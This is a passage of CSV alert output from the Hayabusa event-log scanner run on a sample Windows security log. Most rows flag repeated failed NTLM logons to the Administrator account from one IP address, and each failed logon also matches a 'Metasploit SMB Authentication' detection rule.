NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
